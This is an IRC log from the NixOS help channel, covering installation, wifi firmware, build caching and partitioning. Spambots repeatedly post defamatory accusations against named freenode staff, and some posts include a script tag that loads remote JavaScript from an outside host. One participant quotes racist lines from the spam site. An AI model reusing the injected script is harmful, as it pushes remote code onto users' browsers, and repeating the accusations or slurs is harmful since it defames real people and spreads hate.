<abueide> yes
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<abueide> also does
<clever> abueide: i would expect things to just work then
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<Goldman6015> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<Goldman6015> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<Goldman6015> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
<Goldman6015> <script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>
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<Goldman603> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<Goldman603> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<Goldman603> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
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<Goldman603> <script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>
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<qyliss> please somebody +r this channel
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<andi-> (or +S) ;)
* gchrist`recovery is working on a thing
<qyliss> yes one of those
<abueide> clever, weird dunno how to proceed then might have to just settle for nix on arch
<clever> abueide: as i said before, try doing a normal nixos-install against a usb stick, from any nixos machine
<clever> abueide: then you can make changes to that stick freely and nixos-rebuild as normal
<clever> and that will let you permanently install wifi drivers to the usb stick
<abueide> hmm i don't have a nix machine so boot from live disk on laptop then install to 2nd flash
<abueide> while the wifi adapter is plugged in
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<clever> abueide: or just plug in an ethernet cable
<abueide> in an apartment without ethernet sadly
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<abueide> allright well i'll try that
<abueide> be back later
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<{^_^}> [nixos-weekly] @domenkozar pushed to master « Add 2018/05 »: https://git.io/fN04d
<{^_^}> [nixos-weekly] @domenkozar opened pull request #59 → Add 2018/05 → https://git.io/fN04N
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<srhb> chromium build now on 22 hours with a timeout of 24. It's not gonna make it. Q_Q
<fresheyeball> ok so I have a harder question
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<fresheyeball> I am seeing a strange thing
<fresheyeball> I write to $out in the checkPhase
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<fresheyeball> is that not ok? becaue rebuilds end up missing those artifacts
<clever> fresheyeball: the checkPhase is still part of the build
<fresheyeball> clever: that is what I thought
<fresheyeball> but files I write to $out in checkPhase don't show up on rebuilds
<clever> fresheyeball: is the checkPhase enabled?
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<clever> fresheyeball: you need doCheck = true;
<fresheyeball> so if I make a trivial code change, it will run the build, and I get a result folder with the stuff in it
<fresheyeball> but if I then rm -r result
<fresheyeball> and run nix-build, it returns cached from the nix-store
<clever> it doesnt need -r or rm
<fresheyeball> and I get a results folder that doesn't have the checkPhase stuff
<clever> can you gist your nix file?
<{^_^}> [nixpkgs] @LnL7 merged pull request #43993 → cntlm: add support for darwin → https://git.io/fNlo6
<{^_^}> [nixpkgs] @LnL7 pushed 2 commits to master: https://git.io/fN0Bh
<fresheyeball> that is an exerpt
<fresheyeball> my tests output a .xml file into $out
<clever> fresheyeball: you dont have a doCheck = true;
<clever> so it never runs the checkPhase
<fresheyeball> it does though
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<fresheyeball> as in when I run nix-build I see my tests run
<clever> fresheyeball: what part of that is writing to $out?
<fresheyeball> ./Setup test unit
<clever> fresheyeball: if you add a `ls -ltrh $out` after that line, does it show files being added to out?
<fresheyeball> and when I see my tests run I do get a result/results.xml
<fresheyeball> yes
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<fresheyeball> and I see the file post build
<mightybyte> Anyone know why core libs like binutils-wrapper aren't being cached in this Travis build? https://travis-ci.org/kadena-io/pact-web-repl/jobs/408174840#L970
<fresheyeball> but if I re-run the build, the file is missing
<clever> fresheyeball: can you post a copy from the terminal of you running it, ls'ing result, running it again, and ls'ing result again?
<gchristensen> `the` is banning on some criteria. don't behave like a spammer and you'll be ok :P
<clever> fresheyeball: with `ls -l result result/`
<fresheyeball> ssure
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<clever> gchristensen: does it need to be op'd every time somebody joins?
<gchristensen> sorry?
<clever> gchristensen: the is getting +o every time somebody joins the room
<gchristensen> :o
<gchristensen> hah, ok, uhh thanks
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<fresheyeball> clever: its going to be a few minutes
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<{^_^}> [nixpkgs] @matthewbauer merged pull request #44071 → eot_utilities: change platforms to unix → https://git.io/fNRJ6
<{^_^}> [nixpkgs] @matthewbauer pushed 2 commits to master: https://git.io/fN00n
<iclanzan> How do you guys handle working on a project using `nix-shell` and swtiching to a branch that has a different set of dependencies listed in `default.nix`? Exiting the old shell session and entering a new one manually gets old fast.
<fresheyeball> iclanzan: I exit and re-enter
<fresheyeball> or I keep multiple checkouts
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<gchristensen> clever: thanks, should be fixed now :)
<petersjt014[m]> hi: im looking to get a raspi 3 and run nixos on it (trying it on my pi zw is giving me some trouble). Is any specific variant of the pi3 better supported than the others?
<{^_^}> [nixpkgs] @erikarvstedt opened pull request #44104 → Python docs → https://git.io/fN0EO
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<keith_analog> Hi All, I'm trying to install tcmalloc using nix-env -i gperftools, but when it completes, there is no instance of tcmalloc in /nix/store. Can someone help me to find the right command to make it appear?
<tilpner> d1rewolf - You mean https://tx0.co/1z ? It didn't expire
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<infinisil> keith_analog: Don't ls the nix store to find things, you should have this program in your PATH now
<fresheyeball> ok
<fresheyeball> so I learned more, and I had the problem wrong
<fresheyeball> clever: things sent to $out durring checkPhase, do infact appear on re-run
<fresheyeball> the re-run is not the problem
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<fresheyeball> ghc ran out of memory in a run on CI
<fresheyeball> and re-runs where just caches of that failure
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<fresheyeball> ghc running out of memory made it not deterministic
<keith_analog> infinisil: thx, but i think the problem is a bit different: I'm looking for a libtcmalloc.so file. Should it show up in some default path?
<fresheyeball> and now I need to recover
<infinisil> ,library keith_analog
<{^_^}> keith_analog: Don't install libraries through nix-env or systemPackages, use nix-shell instead. See https://nixos.wiki/wiki/FAQ/Libraries for details.
<fresheyeball> but if I trigger a new `nix-build` it doesn't try again, it just poops out the failure from last time
<clever> fresheyeball: ah, succeed on failure
<keith_analog> infinisil: is ,library a path?
<clever> fresheyeball: you need to check for result/nix-support/failed
<fresheyeball> clever: right
<fresheyeball> clever: right, its there
<clever> fresheyeball: then you need to change something to correct the failure, and re-run it
<infinisil> keith_analog: See the bots reply
<fresheyeball> but its specious, if I make a trival change to the code, it will be successful
<infinisil> keith_analog: {^_^} is a bot
<fresheyeball> clever: there is nothing to change
<keith_analog> infinisil: if i run `nix-shell -p gperftools`, where should i look to find any .so files emitted by gperftools?
<fresheyeball> ghc just ran out of memory
<clever> fresheyeball: if its an intermitent failure due to ram, then you need to fight succeed on failure
<fresheyeball> updating a code comment fixes this
<clever> fresheyeball: delete result, then run nix-store --delete on the output path it made
<clever> fresheyeball: then re-run nix-build again
<fresheyeball> clever: ok!
<{^_^}> [nixpkgs] @pSub merged pull request #43933 → libfilezilla: 0.12.3 -> 0.13.0 → https://git.io/fNWNY
<infinisil> keith_analog: It will probably be in some env var, what do you use it for exactly? It would help if you were a bit more specific
<{^_^}> [nixpkgs] @pSub pushed 2 commits to master: https://git.io/fN0zk
Henson has joined #nixos
<mikky> Hi, I've been with Arch linux for past 14 years and just a few weeks ago I found out this little distro gem. I'm about to try to install NixOS on my home server next to Arch on ZFS over LUKS with UEFI. From running Arch.
<mikky> wish me luck, I only have SSH access to the box :)
<gchristensen> good luck
<keith_analog> so, if i reference ${gperftools}/lib and try to linkwith -ltcmalloc_minimal from inside a .nix script, i see the path /tmp/nix-build-dashmm-multicore.drv-0/multicore/gperftools/lib/libtcmalloc_minimal.so. yet, i can't seem to find any such file in the filesystem if i run, say, nix-shell -p gperftools. how might i do that?
<sir_guy_carleton> mikky: bonne chance
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<infinisil> keith_analog: I think you can just link with `-L${gperftools}/lib`
<keith_analog> infinisil: true, i could. unfortunately i'm using cmake, and need somehow to configure cmake to point at gperftools
<logzet> Hi, what is the preferred way to partially move a nixos installation to a ssd? My preferred way would be to move /boot and /nix to partitions on the ssd. Does this interfere with this mount-/nix/store-readonly stuff? Or is the easier or better way to create a new / on the ssd and partitions for /home etc on the hdd?
<clever> keith_analog: if you do `buildInputs = [ gperftools ];` then the stdenv will add a -L flag for you
<clever> logzet: if you copy the partitions over while it is not running, it should be fine, as long as the old config in /boot is able to find the right partitions to mount
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<clever> logzet: but since its nix, you can also just copy /etc/nixos/configuration.nix and nixos-install again, and it will be virtually identical
<clever> logzet: and if the config is broken after copying the partitions, you could just use nixos-enter to chroot into it, fix the config, and nixos-rebuild boot
dStruct160 has joined #nixos
<dStruct160> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<dStruct160> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<dStruct160> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
dStruct160 has quit [Killed (Sigyn (Spam is off topic on freenode.))]
<clever> too slow!
<clever> gchristensen: i think there is a channel mode that forces you to idle for 30 seconds before you can speak
<mikky> gchristensen, sir_guy_carleton thx
<clever> gchristensen: ah, i think its +d and freenode doesnt have it
<gchristensen> :(
<samueldr> +zm with auto-voice after a delay could help
<RetardedOnion> does anyone run mainline? if so, how are you managing your kernel modules?
<logzet> clever: I'm more or less thinking about the partition layout for now. Would you move / to the SSD or just /nix?
<clever> logzet: depends on what the existing layout is, and what your filesystem preferences are
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<sir_guy_carleton> is there any way of modifying the nix-shell prompt?
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<gchristensen> shellHook = '' PS1='$ ' ''; :)
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<keith_analog> infinisil, clever: thanks, i figured out the issue. it was related to cmake, in fact.
<logzet> clever: / and /boot are extra, I'm just using ext4
<logzet> *are separate partitions
<clever> logzet: id just create a new /boot and /, then clone everything over while booted into a livecd
<logzet> Okay, thanks. ☺
<logzet> But out of curiosity: does putting /nix (or maybe even only /nix/store) on an extra partition cause any issues?
<clever> logzet: not really, as long as configuration.nix knows to mount it
<clever> logzet: i always use zfs, with /nix on its own dataset
<clever> so / can have automatic snapshots, but /nix doesnt
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<sir_guy_carleton> gchristensen: okay, that worked, thanks
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<{^_^}> [nixpkgs] @ryantrinkle pushed to ryantrinkle/remove-empty-file « azure-cli: delete empty nix file »: https://git.io/fN0VJ
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<__idiot__10> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
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<mikky> about UEFI - is it possible to have ESP partition mounted to /boot/efi instead of /boot while having another partition mounted as /boot ?
<samueldr> probably
<logzet> mikky: Why would you do that?
<infinisil> gchristensen: Heh, Sigyn is faster :)
<infinisil> Usually
<samueldr> mikky: https://nixos.org/nixos/options.html#boot.loader.efi.efisysmountpoint
<infinisil> Ah never mind, the wasn't active back then
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<logzet> And another quick question, if nix is not able to fetch a package from the cache. Nix builds it somewhere and moves it to /nix/store when the build succeeds, doesn't it?
<clever> logzet: it would let you have a small fat32 efisys, then a much larger (or even part of the rootfs) /boot for many kernels, and proper journaling
<johnw> logzet: correct
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<mikky> logzet: for once it's what I'm used to :) but more importantly I have a need for multiple EFI loaders to coexist in that partition while having kernel images elsewhere due to partition size constraints
<clever> logzet: if sandboxing is on, it builds it in a chroot like namespace, if sandboxing is off, it just builds directly into /nix/store/
<samueldr> mikky: then boot.loader.efi.efiSysMountPoint is the right option for you AFAIK
<logzet> clever: Is this namespace located outside /nix?
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<mikky> samueldr: seems so, thanks much for the pointer
<logzet> iirc i got some messages from builds in /var or /tmp
<clever> logzet: i think it uses something like ${out}-root as the rootfs for the build, with many bind mounts
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<logzet> mikky: Sounds like a good idea, I have an installation where boot is full after a few kernels, kinda annoying :/
<clever> logzet: i also make my /boot at least 1gig
<clever> logzet: this nixos module will auto-generate an entire nixos installer, and put it in /boot, along with a grub entry to select it
<clever> so as long as /boot is intact, you can repair the system, or even do a full reinstall
<{^_^}> [nixpkgs] @vbgl opened pull request #44106 → ocamlPackages.jingoo: 1.2.7 -> 1.2.18 → https://git.io/fN0w2
<clever> it eats about 300-400mb in /boot though
<mikky> logzet: it's common practice in other distros if one's not using ESP for kernel storage
<{^_^}> [nixpkgs] @dezgeg opened pull request #44107 → Revert "nixos: rename system.{stateVersion,defaultChannel} -> system.nixos.\1" → https://git.io/fN0wo
<mikky> I adopted it fast after adopting EFI
<logzet> I think I even did this, when I installed gentoo on UEFI
<logzet> But without really thinking about the why
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<mikky> especially useful with Ubuntu which doesn't delete old kernels at all
<RetardedOnion> logzet: bios mode is emulation on uefi system
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<drakonis> clever, is there a way to dump the kernels elsewhere
<drakonis> the EFI Partition is tiny
<clever> drakonis: using boot.loader.efi.efisysmountpoint you can have seperate partitions for /boot and /boot/efi
<drakonis> i ran out of space in it and became unable to update
<clever> drakonis: and /boot could become part of / if you wanted
<drakonis> well that's what i want
<fre[m]> test
<mikky> drakonis: unless you encrypt
<logzet> clever: Interesting, what are the advantages over having a stick, which you can use for a live image?
<clever> logzet: you can loose the usb stick :P
<samueldr> logzet: no need to *have* the stick
<clever> you cant loose the /boot
<mikky> clever: depends
<drakonis> i was bitten by that in the past
<clever> well, if /boot is damaged, itsless of a repair, and more of a reinstall
<samueldr> (and if you do, you're probably in a worse situation)
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<logzet> Well, you could just use another stick. And how often does a failure like that occur?
<mikky> clever: not really, you just need the kernel and ram disk. In "normal distros" that is. I still have to figure out how this works in NixOS
<clever> mikky: but if /boot is damaged, what are the changes the rootfs is ok?
<mikky> clever: that's a different story :)
<clever> chances
<mikky> or human error
<mikky> such as mkfs on a wrong partition
<clever> mikky: yeah, you would still need a usb stick then
<clever> rescue_boot.nix just saves you from needing to find that stick for most problems
<mikky> yeah, or some other way to boot something
<mikky> anything
<mikky> if it's a linux :)
<mikky> then just chroot -> repair -> reboot
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<averell|> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
averell| was kicked from #nixos by the [PM gchristensen to dispute this]
<RetardedOnion> what? why?
<drakonis> spam
<srk> /topic #freenode
<drakonis> its been happening for a while
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<samueldr> (don't go to the links, it's unknown if there are security issues)
<drakonis> its also false writings
<mikky> anyway, a separate boot is only needed when one has encrypted root. Otherwise the boot can just be part of root
<samueldr> yeah
<RetardedOnion> lel, lemme boot up my vm. one sec
<drakonis> the actual blog hasn't been updated in 4 years i think
<samueldr> for both targetted individuals, they are copies of their sites, but with modified contents to suit "their narrative"
<samueldr> and it's off-topic
<RetardedOnion> 7: A child born to a woman over the age of 30 is 10 more likely to have autism
<RetardedOnion> so totally legit
<mikky> half of my friends would have to be autistic :)
<RetardedOnion> 1: We need white babies for the upcoming war between the darkies and whites
<gchristensen> RetardedOnion: please stop
<mikky> then again, half of my friends are IT people...
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<RetardedOnion> gchristensen: i will. i still find it funny
<drakonis> i think those folks have too much time to actually write spambots
<clever> 2018-07-25 17:52:23 < swedneck[m]> it seems to be a virus that relies on shitty web clients to propagate
<{^_^}> [nixpkgs] @bennofs opened pull request #44108 → nixos-generate-config: detect extlinux bootloader → https://git.io/fN0rV
<drakonis> ah yes
<clever> i found this being said in another room
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<drakonis> there's one that uses css to run a script
<clever> RetardedOnion: its plausible that its using cross-site scripting to connect to something like the freenode webchat from your ip, and then spam more
<gchristensen> clever: it is also done via a Go program
<RetardedOnion> i ran it in a vm.
<RetardedOnion> in w3m. also i use quassel.
<samueldr> clever: they're probably open web proxies, the script tags are probably byproduct of proxies injecting stuff → any more discussion about spam in the off-topic channel #nixos-chat
* samueldr meant to split messages
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<RetardedOnion> what do you think of guix?
Anton-Latukha has quit [Quit: Leaving.]
<gchristensen> another good chat for #nixos-chat probably :)
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<Lisanna> Are there any secret methods for making a derivation take up more than one job slot according to Nix's accounting?
<gchristensen> 1 drv = 1 job always
<Lisanna> ):
depleted has joined #nixos
<depleted> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
depleted was kicked from #nixos by the [PM gchristensen to dispute this]
<{^_^}> [nixpkgs] @ryantrinkle opened pull request #44109 → azure-cli: delete empty nix file → https://git.io/fN0Kk
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<{^_^}> [nixpkgs] @LnL7 merged pull request #44063 → ycmd: 2018-06-14 -> 2018-07-24 → https://git.io/fNB1g
<{^_^}> [nixpkgs] @LnL7 pushed 3 commits to master: https://git.io/fN06f
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<abueide> clever, so i got nixos installed to the flashdrive with grub and efi but its not booting
<{^_^}> [nixpkgs] @matthewbauer pushed 2 commits to master: https://git.io/fN06I
<{^_^}> [nixpkgs] @matthewbauer merged pull request #44109 → azure-cli: delete empty nix file → https://git.io/fN0Kk
<clever> abueide: if using efi, you have to set the removable flag when you install
<kalbasit> how to `nix repl '<nixpkgs>' /etc/nixos/configuration.nix`? I always get `error: cannot auto-call a function that has an argument without a default value ('config')`
<clever> kalbasit: nix repl '<nixpkgs/nixos>'
<kalbasit> oh
sir_guy_carleton has quit [Quit: WeeChat 2.0]
<abueide> thanks
<kalbasit> nice, that works, thank you clever
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<{^_^}> [nixpkgs] @LnL7 merged pull request #43892 → skhd: bump 0.1.1 to 0.2.2 → https://git.io/fNWrG
<{^_^}> [nixpkgs] @LnL7 pushed 2 commits to master: https://git.io/fN061
<abueide> nice it booted
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<abueide> clever, what am i supposed to do now? now that its actually installed on the flash drive do you think the adapter will work?
<clever> abueide: depends on if you enabled the firmware in the configuration.nix
ffernand29 has joined #nixos
<ffernand29> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<ffernand29> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<ffernand29> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
<ffernand29> <script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>
apollojustice21 has joined #nixos
<apollojustice21> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<apollojustice21> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<apollojustice21> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
<ffernand29> This message was brought to you by Private Internet Access
<apollojustice21> <script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>
<apollojustice21> This message was brought to you by Private Internet Access
ffernand29 has quit [Killed (Sigyn (Spam is off topic on freenode.))]
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<iqubic> Did we just get bot spammed?
<samueldr> freenode's being spammed for hours
<samueldr> btw, don't visit any of their links, just in case
graphene has quit [Remote host closed the connection]
<samueldr> and any more discussion about the spam wave or attacks to → #nixos-chat thanks
<iqubic> They're all JS links. I don't run untrusted JS on my machine.
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<abueide> clever, so just do this and I should be good?
<abueide> hardware.enableAllFirmware = true;
<abueide> hardware.enableRedistributableFirmware = true;
<abueide> boot.kernelModules = [ "rt2800usb" ];
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<clever> abueide: probably, boot the stick up and see if the usb works
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<mikky> Anyone uses remote LUKS unlocking via ssh? It doesn't seem to be documented well but I found a few pull requests in github dealing with it. Bit confused as to how to make sure the boot process will continue after I unlock the partition - the cryptsetup passphrase prompt in boot console will have to be killed safely somehow without failing the boot process ... but how?
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<{^_^}> [nixpkgs] @primeos pushed 2 commits to master: https://git.io/fN0Pc
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<clever> mikky: this shell script will kill other cryptsetup prompts after it gets a password entered
<clever> which i believe will un-stick the /init script that was blocked on a console password
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<tadni> Okay, so I've been doing a lot of debating back and forth ... and really kind-of want to go NixOS on my independent-study/development machines (desktop and a laptop) to practically 'reteach myself programming' on/around the JVM. Should something like intellij work 'right out of the box' if I override the jdk to be jetbrains? Guess I'm trying to figure out if the trouble is "worth it" at this point of my experience.
<tadni> Adding an extra-layer of complexity over everything.*
7GHABFWQT has joined #nixos
<7GHABFWQT> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<7GHABFWQT> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<7GHABFWQT> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
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<NvpkD1y7Ez5> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<NvpkD1y7Ez5> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<NvpkD1y7Ez5> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
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<Lisanna> gchristensen OK, better idea: https://github.com/NixOS/nix/issues/2307
<{^_^}> nix#2307 (by ledettwy, open): Consumable remote build features
<Lisanna> (than derivations being able to take up more than one job slot)
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<abueide_> clever, it didn't work :(
<clever> abueide_: but now you are free to boot the usb stick on another machine that does have wifi, tweak the config, and nixos-rebuild again
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<abueide_> clever, yes but i don't know what else to tweak
<clever> abueide_: do you have 2 computers available, with ethernet ports, and an ethernet cable?
<abueide_> no ethernet cable
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<abueide_> can easily tweak and nixos-install again on my laptop with internet
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<clever> abueide_: no need to nixos-install now, you can just boot the usb normally, adjust, and nixos-rebuild
<clever> abueide_: you can also test the usb wifi on that machine, and see if it works there first
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<abueide_> it doesn't work on this one or the other one
<abueide_> clever, also I don't know how to set up wifi yet so i'm using the graphical installer
<abueide_> i think my wifi requires sign in through browser
<clever> abueide_: you can enable graphical on the usb, and install a browser
<{^_^}> [nixpkgs] @Profpatsch opened pull request #44110 → Improve lib/trivial docstrings & formatting → https://git.io/fN01J
<abueide_> yeah i'll figure that out
<abueide_> i was gonna intall xmonad
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<abueide_> whats the best solution for creating wifi profiles for netctl? in arch linux i used wifi-menu and netctl-auto where wifi-menu would create the profile after the first sign in and then it would auto switch to the best wifi network you had a profile for
<clever> abueide_: i just use bare wpa_supplicant
<tadni> Eh, ya know I might just go the safer way of just going Arch and making a NixOS partition tbh.
<tertle||eltret> joepie91: wussup
<tertle||eltret> xmonad :/
<abueide_> what do you think is better?
<clever> abueide_: it may also help to just look at what arch is doing differently, one min
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<tertle||eltret> tadni: arch is not safer
<clever> abueide_: can you boot the arch install cd, load up the wifi driver, and then run a command like this?
<clever> [root@amd-nixos:~]# ls /sys/class/net/enp3s0/device/driver -l
<clever> lrwxrwxrwx 1 root root 0 Jul 25 19:19 /sys/class/net/enp3s0/device/driver -> ../../../../bus/pci/drivers/e1000e
<tertle||eltret> its an illusion
<clever> abueide_: in my case, it says e1000e is responsible for enp3s0
<clever> abueide_: once we find out what arch is doing specially, we can just do the same thing in nixos
<abueide_> clever, i'd have to wipe the graphical install (which i'm currently on) but yeah i can
<abueide_> brb
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<clever> abueide_: dont have a spare usb?
<abueide_> wait would booting up a regular arch install work or does it have to be live disk?
<clever> abueide_: a normal install also works
<tadni> tertle||eltret: Safer in the sense of having 'a better clue' of what I'm doing right out of the gate; Think I'm putting too much weight on my shoulders to actually be productive in independent study right off the back -- if I try to do near full-time study for a year while compounding being productive on NixOS right off the back ... though I really want to
<clever> any linux where the wifi actually works
<abueide_> oh okay i'll just rebot into the normal install
<abueide_> brb
<{^_^}> [nixpkgs] @LnL7 opened pull request #44111 → elixir: init 1.7.0 → https://git.io/fN01F
<tadni> It does seem trivial to just have a seperate root partition and eventually just bootstrap to it and update my /boot to point to it
<tadni> The more I look at the install procedure again
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<tertle||eltret> tadni: yeah im using it on my backup machine
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<tertle||eltret> but the more i sue it the I notice that everything works
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<abueide_> clever, k what did you want me to do?
<clever> abueide_: what is the name of the interface in `ip link` ?
<abueide_> wlp0s29u1u2
<clever> ls /sys/class/net/wlp0s29u1u2/device/driver -l
<tadni> If I was doing Haskell or something, I think I'd jump right in -- but while there seems to be trivial support for an area of interest like Scala (sbt2nix), more I'm thinking about it now I might just be setting myself out to fail (or at least get quickly discouraged ...)
<clever> abueide_: what does this output?
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<abueide_> ls lrwxrwxrwx 1 root root 0 Jul 25 15:23 /sys/class/net/wlp0s29u1u2/device/driver -> ../../../../../../../bus/usb/drivers/rt2800usb
<clever> abueide_: `dmesg | egrep 'rt2800usb|firmware' -i -C5` and throw it into a pastebin
<tadni> tertle||eltret, Yeah, I have a cheap laptop laying around, I was considering messing around with a bit more ... used it in the pass, but I have seemingly poor moderation and fall quickly into that all or nothing mentality; So nix'd it (ha ha) for a bit
<tadni> in the past*
<tertle||eltret> all or nothing?
<abueide_> clever
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<tadni> tertle||eltret: Eluding back to the poor moderation bit, where if I can't have something everywhere it's hard for me to have/run it all technologically.
<clever> [ 54.830421] ieee80211 phy1: rt2x00lib_request_firmware: Info - Loading firmware file 'rt2870.bin'
<clever> abueide_: i can see it loading normally, and requesting the firmware
<clever> [ 54.830821] ieee80211 phy1: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.36
<tertle||eltret> oh i see tadni, to each thier own
<tadni> Personality quirk, to put it nicely
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<clever> abueide_: if you now boot the nixos usb stick, and repeat the same command, what do you see?
<tertle||eltret> tadni: i know what you mean,. i once tried to run the fully libre OS on all my machines
<tertle||eltret> needless to say, the rabbit hole is deep and had seen enough
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<tadni> tertle||eltret, Oh, I know that one -- actually learned about Guix before NixOS and was trying to run it full-time for a couple months and just got pretty much no-where... didn't happen it was within the first year of it being public and very very little was packaged-definitioned yet
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<tadni> Also did a little parabola in HS, when it was new/hip; Luckily the extreme bent I had back then it mostly gone... :^P
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<tertle||eltret> yeah its hard to justify that torture for long lol
<clever> abueide: `dmesg | egrep 'rt2800usb|firmware' -i -C5` and throw it into a pastebin
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<tadni> tertle||eltret, Frame things as a extreme moral imperative and it can buy you a few years (sadly).
<mkaito> you know, it would be cool to have nixos-rebuild on non-nixos nix installations just because of the --target-host option.
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<clever> abueide: try booting nixos without the wifi plugged in, then plug the wifi in after booting
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<tadni> Yeah, think that's the way to go -- especially because both of these machines have well over 1tb of free-space; Maybe eventually end up on spare laptop full-image.
<tadni> Okay, that was me mostly justifying by talking to myself in a public room ... but thanks guys! lol
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<tadni> halfbit: Great nick.
<tadni> Very punny
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<halfbit> :-)
<clever> abueide: what if you compare `uname -a` on both nixos and arch?
<abueide> Linux Archanon 4.17.8-1-ARCH #1 SMP PREEMPT Wed Jul 18 09:56:24 UTC 2018 x86_64 GNU/Linux
<abueide> Linux anonix 4.14.54 #1-NixOS SMP <date time here> x86_64 GNU/Linux
<clever> abueide: switching to 4.17 might help
<abueide> how do I do that
<abueide> on nixos
<abueide> do i need to use unstable
<clever> abueide: boot.kernelPackages = pkgs.linuxPackages_4_17;
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<Peetz0r24> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<Peetz0r24> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<Peetz0r24> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
<Peetz0r24> <script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>
<Peetz0r24> This message was brought to you by Private Internet Access
* clever pokes gchristensen
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<iqubic> I can't resize the root partition when the machine is running can I?
<clever> iqubic: depends on the filesystem and which direction the size is going
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<iqubic> I want to shrink an EXT4 partition containing the root of the filesystem.
<clever> iqubic: first, run resize2fs on the device, with the new size you want to use
<iqubic> I can just do that?
<clever> it should detect that its mounted, and contact the kernel and arrange for things to happen
<clever> iqubic: check its man page and read things closely
<clever> (Modern Linux 2.6 kernels will support on-line resize for file systems mounted using ext3 and ext4; ext3 file systems will require the use of file systems with the resize_inode feature enabled.)
<iqubic> How do I get the size of a partition?
<clever> iqubic: fdisk -l
<iqubic> Or lsblk.
<clever> iqubic: you may also want to try gparted, it supports resize and has a gui
<iqubic> I don't think that will let me shrink while running.
<clever> try it first
<iqubic> I want to shrink the partition containing the root of the filesystem, while the machine is running.
<clever> try it first
<iqubic> Yeah. It isn't letting me shrink the root partition while the machine is running.
<clever> and why do you need to shrink it while its running?
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<iqubic> I don't. I was just hoping to save time by not having to reboot.
<clever> ah
<iqubic> I can boot into a live system if that is needed.
<clever> that would be simpler and safer
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<iqubic> Why is this Debian Installer ISO so confusing?
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<iqubic> Does it just have a simple way for me to launch a gui so I can shrink the FS?
<clever> its meant to be an installer, not a livecd where you can demo things
<iqubic> Well this stinks
<Dezgeg> IIRC there is an option to get a shell
<Dezgeg> but it might be too limited to not have resize2fs
<iqubic> I found a shell, but it was too limited to even have "lsblk"
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<iqubic> Yeah... I'll go get a different USB and see if that works better.
<iqubic> I might have something else laying around.
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<tertle||eltret> should I only install cabal in a nix-shell as well?
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<abueide__> clever, slow internet kernel is taking a while
<iqubic> Well, time to make a LiveCD that I can actually use to shrink stuff
<clever> iqubic: this is also a good use for my rescue env
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<clever> iqubic: add imports = [ ./rescue_boot.nix ]; to your configuration.nix, and setup xserver on lines 9-13
<clever> and then you have the entire installer sitting in /boot
<iqubic> I'll look into that.
<iqubic> What does it do?
<clever> it adds a grub option that boots into the installer
<clever> and the entire installer is a ~400mb file in /boot
<iqubic> I see. I use Systemd-boot, so I'm not sure it will help me that much.
<clever> yeah, it currently doesnt support systemd-boot
<iqubic> So I'm sorry.
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evil17 has joined #nixos
<evil17> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<evil17> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<evil17> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
<evil17> <script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>
<evil17> This message was brought to you by Private Internet Access
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<{^_^}> Channel nixos-18.03-small advanced to https://github.com/NixOS/nixpkgs/commit/adf8df1bb13 (from 5 hours ago, history: https://channels.nix.gsc.io/nixos-18.03-small)
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<iqubic> Can we kick them?
<samueldr> they are, by freenode, but it's extremely hard to know whether it's a legit user before they talk :/
<clever> but in theory, the server could auto-kick, without relaying the msg to others
<joepie91> clever: the main problem is that people copy-paste the spam to report it
<joepie91> so a blind kick/ban of everybody who spams would also catch a lot of innocent users
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<clever> joepie91: it could be an exact message match, so when you copy/paste the name is added and it doesnt match
<samueldr> clever: exactly, in theory :
<joepie91> clever: people sometimes copy just the message too :)
